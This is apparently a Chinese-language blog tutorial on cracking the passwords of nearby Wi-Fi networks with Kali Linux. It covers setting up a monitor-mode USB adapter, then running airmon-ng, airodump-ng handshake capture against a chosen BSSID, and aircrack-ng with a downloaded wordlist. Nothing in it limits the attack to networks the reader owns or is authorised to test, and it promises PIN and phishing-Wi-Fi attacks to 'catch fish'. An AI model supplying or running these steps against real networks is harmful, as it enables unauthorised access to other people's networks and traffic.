一、部署前准备 {#一-部署前准备}

1、VMware workstation {#1-VMware-workstation}

官网下载 点击直达

PS：这是官网下载地址需要登录账号，如果你没有账号，就下载共享网盘里的。

博主共享网盘 Alist网盘

2、Kali系统 {#2-Kali系统}

官网下载 点击直达

PS：进去直接下载适用VMware版本的即可。

3、USB无线网卡 {#3-USB无线网卡}

PS1：无线网卡需要支持AP模式；Monitor模式；在Kali和CDLinux下免驱；支持Aircrack-NG等。

PS2：某宝，某东有卖，直接搜kali无线网卡，比如买下图这种的，另外建议买免驱的，不然到时候还要装驱动，如果买回来发现用不了，问店家要驱动下载链接。

4、密码本 {#4-密码本}

博主共享网盘 Alist网盘

二、安装VMware workstation {#二-安装VMware-workstation}

三、安装Kali {#三-安装Kali}

PS：将刚刚下载的Kali镜像文件解压缩，你会得到很多vmdk文件和一个vmx文件，将文件存放到自定义位置

上面确认点击完后，界面不管弹什么都不要按键盘，让系统自己运行即可，然后系统会到下图输入账号密码位置

3.1、进入root用户 {#3-1-进入root用户}

root密码就是：kali

sudo -i

3.2、查看IP {#3-2-查看IP}

此时我还未插入USB无线网卡，所以只能看到lo接口和eth0口

ip addr

3.3、测试上网 {#3-3-测试上网}

ping www.baidu.com

四、安装无线网卡 {#四-安装无线网卡}

4.1、插入无线网卡 {#4-1-插入无线网卡}

4.2、查看网卡 {#4-2-查看网卡}

ip addr

ifconfig

明显没有识别到，要安装驱动

4.3、安装驱动 {#4-3-安装驱动}

apt install realtek-rtl88xxau-dkms

无法安装，应该是更新源的问题，改更新源试试

4.4、改更新源 {#4-4-改更新源}

leafpad /etc/apt/sources.list

没有leafpad命令，根据提示安装

apt install leafpad

也无法安装leafpad命令

用vim试试可以的

vim /etc/apt/sources.list

写入清华大学的保存退出

#清华大学 [更新源]
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free 
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free

#浙江大学[更新源]
deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free 
deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free

4.5、使更新源生效 {#4-5-使更新源生效}

apt-get clean && apt-get update -y

4.6、重新安装无线网卡驱动 {#4-6-重新安装无线网卡驱动}

apt install realtek-rtl88xxau-dkms

等跑码跑完后，重启系统

reboot now

4.7、检查网卡 {#4-7-检查网卡}

重启完成后，输入下面的命令查看，显示wlan0表示正常

ip addr

ifconfig

五、寻找附近可抓包Wi-Fi {#五-寻找附近可抓包Wi-Fi}

5.1、停止网络管理器服务 {#5-1-停止网络管理器服务}

PS：建议关闭，会对抓包效果好一些，不然会影响无线网卡监听和抓包，实测下好像没有影响，但是我测试抓的包基本都无解，可能是我密码本还不够全吧

sudo service NetworkManager stop

5.2、结束无线网卡所有进程 {#5-2-结束无线网卡所有进程}

sudo airmon-ng check kill

5.2.1、复查进程是否真正关闭 {#5-2-1-复查进程是否真正关闭}

**PS：通过上图回显的可以看出，刚刚将PID=935,Name=wpa_supplicant的进程给kill了，用下面的命令在复查一下**

ps -aux | grep wpa_supplicant

PS：如果回显和下面的一样怎关闭，如果还在运行，则会显示俩行，第一行是我们root用户的grep，另一样是用户的运行状态

5.3、查看网卡状态 {#5-3-查看网卡状态}

PS：我有俩张Kali无线网卡，一张wlan0，一张wlan1

ifconfig

5.4、开启网卡监听模式 {#5-4-开启网卡监听模式}

sudo airmon-ng start wlan0

sudo airmon-ng start wlan1

5.4.1、查看监听网卡名称 {#5-4-1-查看监听网卡名称}

ifconfig

5.5、搜索附近所有信号 {#5-5-搜索附近所有信号}

PS：下面的wlan1填上面ifconfig回显的名称，我用wlan1，因为wlan1可以监听5GHz信号，比wlan0mon好一些，我的wlan0mon无线网卡只能监听2.4GHz信号

PS：如果附近搜不到信号，或者搜索到的信号较弱，或者搜索到的Wi-Fi信息没有数据（数据这里，稍等截图里面教你怎看），我们可以尝试搜索附近5GHz信号

sudo airodump-ng wlan1

5.6、搜索附近5GHz信号 {#5-6-搜索附近5GHz信号}

airodump-ng -C 5180-5825 wlan0

PS：敲完回车之后要等一会才会出来搜索结果，我的差不多要等1分钟左右，搜索速度应该跟你的无线网卡好坏有关

六、上传密码本 {#六-上传密码本}

PS：通过MobaXtrem左侧上传密码本到Kali系统内

七、开始抓包 {#七-开始抓包}

PS：-c 后面的11是信道，--bssid后面的是被抓包wifi的mac，-w是将抓到的数据包存放在当前目录，也就是root目录，用wlan1网卡去抓

airodump-ng -c 11 --bssid 02:1B:FF:97:DD:CE -w ./wifi-cap wlan1

八、开始解包 {#八-开始解包}

PS：-w后面是的你的密码本路径，-b后面是被抓包wifi的mac地址，解包的路径也就是下载路径，但是从下面的截图可以看出，不止一个cap包，所以我们用星号代替，这样可以解析所有包

aircrack-ng -w /home/young/下载/ruomima.txt -b 02:1B:FF:97:DD:CE  /home/young/下载/wifi-cap*.cap

九、进阶版 {#九-进阶版}

PS：有空我再更新，这几天没时间搞，另外还有俩种破解方法，PIN和钓鱼wifi，加上本文的密码本破解方式共三种，其中PIN是百分百一定可以破解的，密码本是百分之99.9999999%，钓鱼wfi我试过，如果被钓者懂一些网络知识，可能不会轻易上当，后面给大家模拟一下，钓鱼wifi也是比较牛逼的方法，可以多开钓鱼wifi信号，坐等小鱼上钩。